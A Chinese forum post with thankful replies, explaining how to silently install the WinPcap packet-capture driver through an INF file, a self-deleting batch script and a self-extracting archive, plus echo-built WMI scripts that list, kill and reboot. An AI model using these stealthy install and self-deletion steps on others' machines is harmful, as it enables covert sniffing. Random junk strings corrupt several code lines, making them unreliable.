+ Q, E, V7 e! [5 J- G. k  P- C  v除去反安装的部分，关键的文件有三个：wpcap.dll，packet.dll和npf.sys。前面两个文件位于system32目录下，第三个在system32\drivers下。而注册表的变化是增加了一个系统服务NPF。注意，是系统服务（即驱动）不是Win32服务。

作为系统服务，不但要在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下增加主键，在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root下也增加主键。而后者默认只有SYSTEM身份才可以修改。幸运的是，并不需要手动添加它，winpcap被调用时会自动搞定。甚至完全不用手动修改注册表，所有的事winpcap都会自己完成，只需要将三个文件复制到合适的位置就行了。
4 V1 r. _0 h6 x6 A
作为范例，还是演示一下如何修改注册表：利用前面说过的inf文件来实现。
- b; S+ N" Q4 h( ^1 r
[Version]
, [( L& @+ N2 ]% e, J$ }' P; kSignature="$WINDOWS NT$"
0 D7 ^, o. R9 Q[DefaultInstall.Services]
AddService=NPF,,winpcap_svr
+ g5 @, p% k; i$ \& F( j+ m[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
StartType=3
9 c. b5 l0 S1 s# FErrorControl=1
ServiceBinary=%12%\npf.sys
& ^% P( D0 a# \) T2 F- o- W
& ]4 _0 }% |4 ?将上面这些内容保存为_wpcap_.inf文件。
再写一个批处理_wpcap_.bat：
$ O# ~: J/ m; w4 m( h
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
del _wpcap_.inf
if /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32\
* g6 I+ P: }# E- `# t; J% D' J- Hcopy wpcap.dll %SYSTEMROOT%\system32\
, S+ |, C# L9 Qdel packet.dll
del wpcap.dll
:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
/ b" l* r+ f' ?6 ~7 Q& Q: v9 f:END
+ ^" z( Q) J* x" }/ rdel %0
+ J) ?0 U3 L; M9 w/ D8 d) N
: r  D0 k8 l# v! D8 P1 p% P然后用winrar将所有文件（5个）打包为自解压的exe，并将『高级自解压选项』->『解压后运行』设置为_wpcap_.bat，命令行的winpcap安装包就制作完成了。
0 ]* m* s1 V  q9 b, g- R  U# B" |
注意，批处理最后一行没有回车符。否则会因为正在运行而无法删除自己。
- d7 K) }* p2 N. J
! w/ l9 j( N7 g7 ]7 w. E/ b% j: t所有的软件安装，基本上可以套用这个思路。但也有例外的，那就是系统补丁的安装。
由于系统补丁有可能要替换正在被执行或访问的文件，所以用copy命令是不行的。
, A1 Q: y* [3 X/ \幸好，Windows补丁包支持命令行安装。
比如：

KB824146.exe -n -z -q

! U" I0 p2 b( [2 M  G8 A-n 不保留备份
-z 不重起
-q 安静模式
: z/ g( T& R# k  @6 g3 P/ G
) T2 N+ K- L2 Y: C9 v如果有一堆补丁要打，那么用RAR打包成自解压文件，外加一个批处理。
& T# T/ Z4 v; I6 G
for %%f in (KB??????.exe) do %%f -n -z -q
% f  C; @. n7 P3 W/ j/ a2 t6 w4 T' Kfor %%f in (KB??????.exe) do del %%f
del %0


Windows脚本
: E' C" X5 u: x. f3 s- I" S很多事用脚本来做是很简洁的。下面给出几个常用脚本的echo版。
  L2 V# l! k% D
$ ?' m* f% Y/ w0 z1，显示系统版本

! o0 G0 f" v. R/ Z@echo for each ps in getobject _ >ps.vbs
6 B4 ?( }% y3 }6 g2 q1 j' P@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>ps.vbs
@echo wscript.echo ps.caption^&" "^&ps.version:next >>ps.vbs
3 H. X2 E7 ^0 @* m3 ncscript //nologo ps.vbs & del ps.vbs

2，列举进程
9 W8 B0 J6 `+ i9 P% I' ?
@echo for each ps in getobject _ >ps.vbs
; G5 q( e3 y& g! A/ F  A@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
+ [8 b0 s/ @1 U@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs

3，终止进程
9 p: U& I9 R  m
@echo for each ps in getobject _ >pk.vbs
+ m, [( b, w( C9 `@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pk.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs

+ e6 Z- t0 _% e& N0 y6 q要终止PID为123的进程，使用如下语法：
! _% }+ j+ Y/ N0 H7 Acscript pk.vbs 123

如果显示一个0，表示终止成功。
" V- ]3 {0 ?0 ]( Z7 Q" L, ^
3 N( I5 u) |- b0 k然后：
; B# n3 Y3 Q7 Ndel pk.vbs

4 U+ l: L5 y5 P# e# B4，重启系统
1 S. O( O; }1 a; O4 e
1 e4 N. z( g, Q- _@echo for each os in getobject _ >rb.vbs
! ?( [$ W# u& B* J- Q( I@echo ("winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem").instances_ >>rb.vbs
@echo os.win32shutdown(2):next >>rb.vbs & cscript //nologo rb.vbs & del rb.vbs
7 W" A% ^* T" G
' }: e  D6 e8 W% U6 G3 {+ ]5，列举自启动的服务

$ s: U9 \6 ]* j$ _3 a3 U. F9 D@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
@echo if sc.startmode="Auto" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs
; L' W( D( C+ y) i9 b3 j2 r. n& U
6，列举正在运行的服务
. V  E; B+ q: k5 B0 u
/ _+ Y$ m6 ^% s7 _; O- z@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
@echo if sc.state="Running" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs
6 Y5 J4 V7 s9 t3 v: l! _
  |  a/ y! u. |: ^" p6 j! O# U7，显示系统最后一次启动的时间

@echo for each os in getobject _ >bt.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>bt.vbs
( K) u$ c) ?. s9 \. \@echo wscript.echo os.lastbootuptime:next >>bt.vbs & cscript //nologo bt.vbs & del bt.vbs

显示结果的格式是：
yyyymmddHHMMSSxxxxxxZZZZ
_年_月日时分秒_微秒_时区
9 D! K# {8 o( v" u
8，显示系统运行时间
# G( U! T# w* H) M8 o
@echo for each os in getobject _ >rt.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_perfrawdata_perfos_system").instances_ >>rt.vbs
/ K- M( M5 l7 t, D/ z@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt.vbs
. J* w9 d0 v; E' ]$ d% X@echo t=t^&mid(s,i,1):d=t\86400:r=r^&d:t=t mod 86400:next >>rt.vbs
@echo wscript.echo cint(r)^&"d "^&t\3600^&"h "^&t\60 mod 60^&"m "^&t mod 60^&"s":next >>rt.vbs
: ^" W& ]; }" ocscript //nologo rt.vbs & del rt.vbs

这个运行时间是从性能计数器中获得的64位整型数，不会出现在49.7天后溢出的情况。

juneshumo

太好了…………感激不尽…………

iTonyDou

有学了不少东西，呵呵，谢谢楼主了！！！！！！！！！！